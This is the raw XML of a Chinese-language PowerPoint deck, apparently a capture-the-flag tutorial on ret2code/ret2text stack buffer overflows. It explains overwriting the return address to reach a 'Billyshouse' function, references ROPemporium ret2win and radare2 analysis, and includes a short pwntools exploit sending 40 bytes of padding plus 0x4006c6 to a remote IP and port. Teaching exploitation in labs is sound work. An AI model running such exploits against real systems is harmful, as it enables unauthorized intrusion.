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8" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="265" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="258" r:id="rId9"/>
    <p:sldId id="257" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="264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86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2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15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99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67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8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8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8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9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1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C049-CC99-4C52-94BF-82913BFE788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37A4-9C2F-450E-B85A-4D5FCCDC6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04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et2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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/ret2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5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7" y="1451859"/>
            <a:ext cx="3463036" cy="3509755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 flipH="1">
            <a:off x="4349363" y="1451859"/>
            <a:ext cx="18700" cy="28497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60223" y="1574707"/>
            <a:ext cx="28276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①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 overflow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一直蓋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saved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rbp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496730" y="5025224"/>
            <a:ext cx="3884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②在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address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處填入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Billyshouse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函式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>的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297081" y="4659464"/>
            <a:ext cx="3745064" cy="79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26479" y="4367076"/>
            <a:ext cx="2296847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Billyshouse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732909" y="3848201"/>
            <a:ext cx="269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Return TO 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08690" y="6029363"/>
            <a:ext cx="39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Billyshouse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函式的位址 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>0x4006c6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60223" y="4260517"/>
            <a:ext cx="1024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ret2code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6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撰寫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6600" dirty="0" smtClean="0"/>
              <a:t>exploit code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389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271" y="1008413"/>
            <a:ext cx="74623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pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> import *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= "120.114.62.211"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>port = 6126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context.arch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> = "amd64"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r = remote(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, port)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r.sendlineafter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>("?",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b"a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"*40+ p64(0x4006c6) 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r.interactive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72" y="642652"/>
            <a:ext cx="5298267" cy="34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更多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="6600" dirty="0" smtClean="0"/>
              <a:t>範例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="6600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ROPemporium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>/ret2win/64bit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51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73" y="722527"/>
            <a:ext cx="6383723" cy="55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01" y="392968"/>
            <a:ext cx="6389074" cy="60475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3183" y="1431235"/>
            <a:ext cx="3999506" cy="1089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2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程式行為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="6600" dirty="0" smtClean="0"/>
              <a:t>分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="6600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>radae2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6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" y="2478735"/>
            <a:ext cx="7870440" cy="13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逆向分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="6600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>radae2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79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5141" y="351498"/>
            <a:ext cx="2822216" cy="734978"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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gohome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382" y="1433423"/>
            <a:ext cx="6590750" cy="527746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187893" y="5271714"/>
            <a:ext cx="5324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177415" y="5106062"/>
            <a:ext cx="5324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026" y="217914"/>
            <a:ext cx="4690386" cy="63256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4" y="479480"/>
            <a:ext cx="2785018" cy="689361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124863" y="564543"/>
            <a:ext cx="628153" cy="604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293704" y="866692"/>
            <a:ext cx="2512613" cy="2385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00" y="1873278"/>
            <a:ext cx="2197195" cy="2226837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="直線單箭頭接點 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2854518" y="985962"/>
            <a:ext cx="1439186" cy="1033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257992" y="2724068"/>
            <a:ext cx="1056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24724" y="3888002"/>
            <a:ext cx="1056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265446" y="4592440"/>
            <a:ext cx="1056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212217" y="5444740"/>
            <a:ext cx="1056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182951" y="6211277"/>
            <a:ext cx="1056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039927" y="6037674"/>
            <a:ext cx="1450202" cy="1326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551272" y="5905808"/>
            <a:ext cx="1300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</a:rPr>
              <a:t>可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bufferoverflow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22030" y="5518204"/>
            <a:ext cx="2039012" cy="7633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14" y="4714400"/>
            <a:ext cx="3823991" cy="6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2" y="1710317"/>
            <a:ext cx="4732313" cy="339820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1" y="1837537"/>
            <a:ext cx="2809875" cy="447675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3199178" y="1791423"/>
            <a:ext cx="620202" cy="539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99178" y="4131448"/>
            <a:ext cx="1056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86856" y="3299790"/>
            <a:ext cx="3732641" cy="5009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86855" y="1837538"/>
            <a:ext cx="1363155" cy="3649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844793" y="1010260"/>
            <a:ext cx="5766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Billyshouse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函式的位址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0x4006c6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8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102</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小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佈景主題</vt:lpstr>
      <vt:lpstr>ret2code/ret2text</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>r2  gohome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Tseng</dc:creator>
  <cp:lastModifiedBy>Ben Tseng</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-11T19:46:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-15T08:22:21Z</dcterms:modified>
</cp:coreProperties>
</file>